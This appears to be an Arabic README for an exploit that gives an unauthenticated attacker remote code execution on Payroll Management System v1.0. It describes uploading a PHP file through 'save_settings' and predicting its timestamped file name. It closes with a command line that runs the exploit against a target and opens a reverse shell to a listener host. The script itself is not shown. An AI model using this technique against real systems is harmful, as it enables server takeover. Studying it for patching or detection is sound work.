
استغلال تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة لنظام إدارة الرواتب v1.0 عبر رفع ملف ضار، مع التنبؤ باسم الملف وقدرة الشل العكسي.

ثغرة RCE عبر رفع الملفات لـ https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. أسماء الملفات تسبقها طابع زمني بدقة دقيقة. يحاول السكربت تخمين اسم الملف باستخدام الطابع الزمني للدقيقة الحالية والدقيقة السابقة والدقيقة التالية.
يسمح نظام إدارة الرواتب الإصدار 1.0 للمستخدمين برفع الصور عبر صفحة "save_settings". يمكن لمهاجم غير مصادق استغلال هذه الوظيفة لرفع ملف PHP خبيث بدلاً من ذلك. يتم تخزين الملفات المرفوعة في مجلد عام الوصول وتُضاف إلى أسمائها طابع زمني بدقة دقيقة يمكن حسابه بسهولة. يؤدي الاستغلال الناجح لهذه الثغرة إلى القدرة على تنفيذ كود عشوائي بصلاحية المستخدم الذي يشغّل خادم الويب.
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https
